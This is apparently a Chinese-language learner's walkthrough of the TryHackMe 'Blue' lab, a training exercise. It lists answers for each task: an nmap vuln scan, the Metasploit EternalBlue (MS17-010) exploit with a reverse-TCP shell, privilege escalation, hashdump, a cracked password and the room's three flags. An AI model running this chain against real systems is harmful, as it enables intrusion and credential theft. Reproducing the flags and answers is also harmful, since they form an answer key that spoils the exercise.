菜鸡天天看大佬们推荐tryhackme,于是就来试试,正好现在想学学渗透相关的知识,打打靶场。

先简单过了过基础知识,现在来尝试打打免费房间

blue

task1

Scan the machine.

nmap -sV -vv --script vuln 10.10.222.121

How many ports are open with a port number under 1000?

3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

ms17-010

task2

Start Metasploit

Find the exploitation code we will run against the machine. What is the full path of the code?

exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value?

RHOSTS

With that done, run the exploit!

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set rhost 10.10.212.248
set lhost 10.4.18.43
run

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

task3

If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

Set the required option, you may need to list all of the sessions to find your target here.

Run! If this doesn't work, try completing the exploit from the previous task once more.

Once the meterpreter shell conversion completes, select that session for use.

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

task4

Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

Copy this password hash to a file and research how to crack it. What is the cracked password?

alqfna22

task5

Flag1? This flag can be found at the system root.

flag{access_the_machine}

Flag2? This flag can be found at the location where passwords are stored within Windows.

flag{sam_database_elevated_access}

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

flag{admin_documents_can_be_valuable}

这不是vip也太卡了吧(